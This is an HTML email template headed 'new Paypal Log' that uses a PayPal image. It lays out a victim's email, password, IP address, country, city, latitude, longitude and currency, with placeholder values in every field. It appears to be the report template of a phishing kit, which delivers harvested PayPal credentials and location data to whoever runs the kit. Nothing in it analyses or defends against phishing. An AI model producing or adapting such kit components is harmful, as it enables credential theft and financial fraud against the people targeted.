<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>email</title>
  </head>
  <body>
    https://www.paypalobjects.com/marketing/web/US/en/rebrand/Home/Uncookied/new/homepage--splitflow-first--ratio=1-1--for=tablet-up.jpeg?quality=75&width=1500&format=webp

    <div
      style="
        width: 50%;
        border: 1px solid gray;
        border-radius: 20px;
        padding: 20px;
        font-family: monospace;
      "
    >
      <h4>new Paypal Log</h4>
      <p><strong>email :</strong> <span>test@gmail.com</span></p>
      <br />
      <p><strong>password :</strong> <span>test@gmail.com</span></p>
      <br />
      <p><strong>Ip :</strong> <span>test@gmail.com</span></p>
      <br />
      <p><strong>country :</strong> <span>test@gmail.com</span></p>
      <br />
      <p><strong>city :</strong> <span>test@gmail.com</span></p>
      <br />
      <p><strong>latitude :</strong> <span>test@gmail.com</span></p>
      <br />
      <p><strong>Longitude :</strong> <span>test@gmail.com</span></p>
      <br />
      <p><strong>The currency :</strong> <span>test@gmail.com</span></p>
      <br />
    </div>
  </body>
</html>
